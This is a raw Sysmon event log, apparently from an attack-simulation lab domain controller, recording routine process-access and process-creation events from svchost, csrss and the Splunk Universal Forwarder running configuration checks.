13:34:19.298{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002045Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:19.298{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002044Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.298{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002043Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:19.298{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002042Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.298{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E5B-6005-5600-00000000A301}3736C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002041Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.298{59A5CD1D-8E59-6005-4800-00000000A301}39683972C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{59A5CD1D-8E5B-6005-5600-00000000A301}3736C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+6665|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+18319|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002040Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.299{59A5CD1D-8E5B-6005-5600-00000000A301}3736C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8E59-6005-4800-00000000A301}3968C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000002039Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.267{59A5CD1D-8E5B-6005-5400-00000000A301}37683824C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002038Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:19.017{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E5B-6005-5400-00000000A301}3768C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002037Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.017{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002036Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:19.017{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002035Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.017{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002034Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:19.017{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002033Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.017{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002032Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:19.017{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002031Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.017{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002030Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:19.017{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002029Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.017{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E5B-6005-5400-00000000A301}3768C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002028Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:19.017{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002027Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.017{59A5CD1D-8E5B-6005-5300-00000000A301}35483528C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{59A5CD1D-8E5B-6005-5400-00000000A301}3768C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002026Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.026{59A5CD1D-8E5B-6005-5400-00000000A301}3768C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk 
ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list replication_port --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{59A5CD1D-8E5B-6005-5300-00000000A301}3548C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list replication_port --no-log 10341000x80000000000000002025Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.017{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E5B-6005-5300-00000000A301}3548C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002024Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:19.017{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002023Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.017{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002022Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:19.017{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002021Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.017{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002020Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:19.017{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002019Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 